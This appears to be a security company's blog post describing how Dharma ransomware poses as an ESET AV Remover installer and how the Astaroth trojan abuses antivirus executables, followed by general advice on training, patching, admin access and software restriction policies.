Cyber attackers have found a new shield in the form of anti-viruses. Since the beginning of the year, number of cases have erupted that indicate at this growing trend where attackers are using anti-viruses to disguise ransomware attacks. The following two cases provide an insight on how attackers are abusing anti-viruses.
A new variant of Dharma ransomware masquerades as an ESET AV Remover Installer in order to trick users and hide its malicious activities. First found in 2016, the ransomware uses the AES-256 encryption. The ransomware that primarily targets storage device was distributed via spam emails that urges users to click on the links attached within the email. Once, the user clicks on the link, it prompts for a password that has been provided in the email. After the user inputs the password, the downloaded files are self-extracting archive named Defender[.]exe, which in turn drops taskhost[.]exe. This is a malicious file and is also the old version of the renamed ESET AV Remover Defender_nt32_enu[.]exe. The ransomware uses the old ESET AV Remover installer that appears unmodified, based on the initial scanning for diverting attention as it encrypts files on victim’s device.
Once the ESET AV Remover installation begins, the ransomware initiates the encryption process in the background. Using the ESET GUI onscreen to distract the user, it processes encryption in the backend. The ransomware runs as a separate instance from the AV remover. Even if the AV remover is not executed, the ransomware will still run. The AV remover process is to trick the users.
In the spring of the year 2019, the infamous Astaroth trojan started to exploit antivirus solutions for hiding its activities and to download additional modules. Researchers analyzed a new campaign that targeted the South American and European countries. It was discovered that adversaries found a way to abuse popular solutions in these regions.
Initially, Astaroth scanned the system for the presence of these security solutions and, if these were detected, it removed itself from the system. However, the malware authors began misusing the legitimate ‘.exe’ file of a solution for downloading additional modules.
Adversaries spread the malware via spam emails with an attached 7ZIP archive. The archive contains the .lnk file, that runs the XLS script abusing BITSAdmin to drop disguised Astaroth Trojan. Malware collects and exfiltrates credentials as well as the data from the clipboard. Researchers believe that the attackers’ objective is to collect bank information and use it for stealing funds from the accounts of victims. The malware collects passwords, therefore, adversaries can use the stolen credentials for infiltrating the organization’s network, to steal sensitive information or to install ransomware.
What could have been done in such situations?
- Periodic cyber security and awareness training
Attackers are coming up with newer and more advanced methodologies to deploy cyber-attacks. It is, therefore, extremely important to enable your employees with the ability to identify such threats. This can be achieved by conducting periodic cyber security and awareness training for employees.
Patch operating systems, software, and firmware on devices. Centralized patch management system will help in the preventing the probable loopholes from being exploited.
Limit Administrative Access
Limiting administrative access will ensure the security of data and prevent the leak of any confidential or sensitive information.
- Policy Implementation
Implement Software Restriction Policies in order to prevent programs from executing ransomware from common ransomware locations such as compression/decompression programs, including the AppData/LocalAppData folder.
It is important to incorporate security habits that can ensure the safety of the organization. According to the statistics, 90% of the cyber-attacks occur due to the negligence of employees. Cyber security companies such as Kratikal help in achieving the objective with its state-of-the-art cyber security products and services.